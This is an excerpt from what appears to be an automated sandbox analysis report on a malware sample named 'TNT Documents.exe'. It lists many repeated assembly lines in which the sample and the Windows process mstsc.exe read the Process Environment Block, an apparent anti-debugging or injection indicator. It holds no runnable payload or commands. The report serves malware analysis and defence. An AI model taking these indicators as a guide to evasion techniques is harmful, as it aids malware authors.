          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01588E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01598EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05633540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0563A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05668DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05672073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05681074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05688B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056353CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056353CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2397 mov eax, dword ptr fs:[00000030h]
